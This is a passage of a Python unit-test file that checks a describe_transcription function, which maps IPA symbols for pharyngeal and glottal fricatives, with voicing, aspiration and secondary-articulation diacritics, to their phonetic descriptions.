# voiceless velarized pharyngeal fricative pulmonic egressive consonant
def test_ħˠ_is_the_representation_of_the_voiceless_velarized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħˠ")
self.assertEqual(actual, expected)
def test_ħ̊ˠ_is_the_representation_of_the_voiceless_velarized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħ̊ˠ")
self.assertEqual(actual, expected)
def test_ħ̥ˠ_is_the_representation_of_the_voiceless_velarized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħ̥ˠ")
self.assertEqual(actual, expected)
def test_ʕ̊ˠ_is_the_representation_of_the_voiceless_velarized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̊ˠ")
self.assertEqual(actual, expected)
def test_ʕ̥ˠ_is_the_representation_of_the_voiceless_velarized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized pharyngeal fricative pulmonic egressive consonant
def test_ħˤ_is_the_representation_of_the_voiceless_pharyngealized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħˤ")
self.assertEqual(actual, expected)
def test_ħ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħ̊ˤ")
self.assertEqual(actual, expected)
def test_ħ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħ̥ˤ")
self.assertEqual(actual, expected)
def test_ʕ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̊ˤ")
self.assertEqual(actual, expected)
def test_ʕ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngeal fricative pulmonic egressive consonant
def test_ħʰ_is_the_representation_of_the_voiceless_aspirated_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħʰ")
self.assertEqual(actual, expected)
def test_ʕ̥ʰ_is_the_representation_of_the_voiceless_aspirated_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̥ʰ")
self.assertEqual(actual, expected)
def test_ʕ̊ʰ_is_the_representation_of_the_voiceless_aspirated_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized pharyngeal fricative pulmonic egressive consonant
def test_ħʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħʰʷ")
self.assertEqual(actual, expected)
def test_ʕ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ʕ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized pharyngeal fricative pulmonic egressive consonant
def test_ħʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħʰʲ")
self.assertEqual(actual, expected)
def test_ʕ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ʕ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized pharyngeal fricative pulmonic egressive consonant
def test_ħʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħʰˠ")
self.assertEqual(actual, expected)
def test_ʕ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ʕ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized pharyngeal fricative pulmonic egressive consonant
def test_ħʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħʰˤ")
self.assertEqual(actual, expected)
def test_ʕ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ʕ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced pharyngeal fricative pulmonic egressive consonant
def test_ʕ_is_the_representation_of_the_voiced_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ")
self.assertEqual(actual, expected)
def test_ħ̬_is_the_representation_of_the_voiced_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħ̬")
self.assertEqual(actual, expected)
# voiced labialized pharyngeal fricative pulmonic egressive consonant
def test_ʕʷ_is_the_representation_of_the_voiced_labialized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕʷ")
self.assertEqual(actual, expected)
def test_ħ̬ʷ_is_the_representation_of_the_voiced_labialized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħ̬ʷ")
self.assertEqual(actual, expected)
# voiced palatalized pharyngeal fricative pulmonic egressive consonant
def test_ʕʲ_is_the_representation_of_the_voiced_palatalized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕʲ")
self.assertEqual(actual, expected)
def test_ħ̬ʲ_is_the_representation_of_the_voiced_palatalized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħ̬ʲ")
self.assertEqual(actual, expected)
# voiced velarized pharyngeal fricative pulmonic egressive consonant
def test_ʕˠ_is_the_representation_of_the_voiced_velarized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕˠ")
self.assertEqual(actual, expected)
def test_ħ̬ˠ_is_the_representation_of_the_voiced_velarized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħ̬ˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized pharyngeal fricative pulmonic egressive consonant
def test_ʕˤ_is_the_representation_of_the_voiced_pharyngealized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕˤ")
self.assertEqual(actual, expected)
def test_ħ̬ˤ_is_the_representation_of_the_voiced_pharyngealized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħ̬ˤ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngeal fricative pulmonic egressive consonant
def test_ʕʰ_is_the_representation_of_the_voiced_aspirated_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕʰ")
self.assertEqual(actual, expected)
def test_ʕ̬ʰ_is_the_representation_of_the_voiced_aspirated_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̬ʰ")
self.assertEqual(actual, expected)
def test_ħ̬ʰ_is_the_representation_of_the_voiced_aspirated_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized pharyngeal fricative pulmonic egressive consonant
def test_ʕʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕʰʷ")
self.assertEqual(actual, expected)
def test_ʕ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̬ʰʷ")
self.assertEqual(actual, expected)
def test_ħ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized pharyngeal fricative pulmonic egressive consonant
def test_ʕʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕʰʲ")
self.assertEqual(actual, expected)
def test_ʕ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̬ʰʲ")
self.assertEqual(actual, expected)
def test_ħ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized pharyngeal fricative pulmonic egressive consonant
def test_ʕʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕʰˠ")
self.assertEqual(actual, expected)
def test_ʕ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̬ʰˠ")
self.assertEqual(actual, expected)
def test_ħ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized pharyngeal fricative pulmonic egressive consonant
def test_ʕʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕʰˤ")
self.assertEqual(actual, expected)
def test_ʕ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̬ʰˤ")
self.assertEqual(actual, expected)
def test_ħ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħ̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless glottal fricative pulmonic egressive consonant
def test_h_is_the_representation_of_the_voiceless_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h")
self.assertEqual(actual, expected)
def test_h̊_is_the_representation_of_the_voiceless_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h̊")
self.assertEqual(actual, expected)
def test_h̥_is_the_representation_of_the_voiceless_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h̥")
self.assertEqual(actual, expected)
def test_ɦ̊_is_the_representation_of_the_voiceless_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̊")
self.assertEqual(actual, expected)
def test_ɦ̥_is_the_representation_of_the_voiceless_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̥")
self.assertEqual(actual, expected)
# voiceless labialized glottal fricative pulmonic egressive consonant
def test_hʷ_is_the_representation_of_the_voiceless_labialized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("hʷ")
self.assertEqual(actual, expected)
def test_h̊ʷ_is_the_representation_of_the_voiceless_labialized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h̊ʷ")
self.assertEqual(actual, expected)
def test_h̥ʷ_is_the_representation_of_the_voiceless_labialized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h̥ʷ")
self.assertEqual(actual, expected)
def test_ɦ̊ʷ_is_the_representation_of_the_voiceless_labialized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̊ʷ")
self.assertEqual(actual, expected)
def test_ɦ̥ʷ_is_the_representation_of_the_voiceless_labialized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized glottal fricative pulmonic egressive consonant
def test_hʲ_is_the_representation_of_the_voiceless_palatalized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("hʲ")
self.assertEqual(actual, expected)
def test_h̊ʲ_is_the_representation_of_the_voiceless_palatalized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h̊ʲ")
self.assertEqual(actual, expected)
def test_h̥ʲ_is_the_representation_of_the_voiceless_palatalized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h̥ʲ")
self.assertEqual(actual, expected)
def test_ɦ̊ʲ_is_the_representation_of_the_voiceless_palatalized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̊ʲ")
self.assertEqual(actual, expected)
def test_ɦ̥ʲ_is_the_representation_of_the_voiceless_palatalized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized glottal fricative pulmonic egressive consonant
def test_hˠ_is_the_representation_of_the_voiceless_velarized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("hˠ")
self.assertEqual(actual, expected)
def test_h̊ˠ_is_the_representation_of_the_voiceless_velarized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h̊ˠ")
self.assertEqual(actual, expected)
def test_h̥ˠ_is_the_representation_of_the_voiceless_velarized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h̥ˠ")
self.assertEqual(actual, expected)
def test_ɦ̊ˠ_is_the_representation_of_the_voiceless_velarized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̊ˠ")
self.assertEqual(actual, expected)
def test_ɦ̥ˠ_is_the_representation_of_the_voiceless_velarized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized glottal fricative pulmonic egressive consonant
def test_hˤ_is_the_representation_of_the_voiceless_pharyngealized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("hˤ")
self.assertEqual(actual, expected)
def test_h̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h̊ˤ")
self.assertEqual(actual, expected)
def test_h̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h̥ˤ")
self.assertEqual(actual, expected)
def test_ɦ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̊ˤ")
self.assertEqual(actual, expected)
def test_ɦ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated glottal fricative pulmonic egressive consonant
def test_hʰ_is_the_representation_of_the_voiceless_aspirated_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated glottal fricative pulmonic egressive consonant"
actual = describe_transcription("hʰ")
self.assertEqual(actual, expected)
def test_ɦ̥ʰ_is_the_representation_of_the_voiceless_aspirated_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̥ʰ")
self.assertEqual(actual, expected)
def test_ɦ̊ʰ_is_the_representation_of_the_voiceless_aspirated_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized glottal fricative pulmonic egressive consonant
def test_hʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("hʰʷ")
self.assertEqual(actual, expected)
def test_ɦ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ɦ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized glottal fricative pulmonic egressive consonant
def test_hʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("hʰʲ")
self.assertEqual(actual, expected)
def test_ɦ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ɦ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized glottal fricative pulmonic egressive consonant
def test_hʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("hʰˠ")
self.assertEqual(actual, expected)
def test_ɦ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ɦ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized glottal fricative pulmonic egressive consonant
def test_hʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("hʰˤ")
self.assertEqual(actual, expected)
def test_ɦ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ɦ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced glottal fricative pulmonic egressive consonant
def test_ɦ_is_the_representation_of_the_voiced_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ")
self.assertEqual(actual, expected)
def test_h̬_is_the_representation_of_the_voiced_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h̬")
self.assertEqual(actual, expected)
# voiced labialized glottal fricative pulmonic egressive consonant
def test_ɦʷ_is_the_representation_of_the_voiced_labialized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦʷ")
self.assertEqual(actual, expected)
def test_h̬ʷ_is_the_representation_of_the_voiced_labialized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h̬ʷ")
self.assertEqual(actual, expected)
# voiced palatalized glottal fricative pulmonic egressive consonant
def test_ɦʲ_is_the_representation_of_the_voiced_palatalized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦʲ")
self.assertEqual(actual, expected)
def test_h̬ʲ_is_the_representation_of_the_voiced_palatalized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h̬ʲ")
self.assertEqual(actual, expected)
# voiced velarized glottal fricative pulmonic egressive consonant
def test_ɦˠ_is_the_representation_of_the_voiced_velarized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦˠ")
self.assertEqual(actual, expected)
def test_h̬ˠ_is_the_representation_of_the_voiced_velarized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h̬ˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized glottal fricative pulmonic egressive consonant
def test_ɦˤ_is_the_representation_of_the_voiced_pharyngealized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦˤ")
self.assertEqual(actual, expected)
def test_h̬ˤ_is_the_representation_of_the_voiced_pharyngealized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h̬ˤ")
self.assertEqual(actual, expected)
# voiced aspirated glottal fricative pulmonic egressive consonant
def test_ɦʰ_is_the_representation_of_the_voiced_aspirated_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦʰ")
self.assertEqual(actual, expected)
def test_ɦ̬ʰ_is_the_representation_of_the_voiced_aspirated_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̬ʰ")
self.assertEqual(actual, expected)
def test_h̬ʰ_is_the_representation_of_the_voiced_aspirated_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized glottal fricative pulmonic egressive consonant
def test_ɦʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦʰʷ")
self.assertEqual(actual, expected)
def test_ɦ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̬ʰʷ")
self.assertEqual(actual, expected)
def test_h̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("h̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized glottal fricative pulmonic egressive consonant
def test_ɦʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦʰʲ")
self.assertEqual(actual, expected)
def test_ɦ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_glottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized glottal fricative pulmonic egressive consonant"
actual = describe_transcription("ɦ̬ʰʲ")
self.assertEqual(actual, expected)
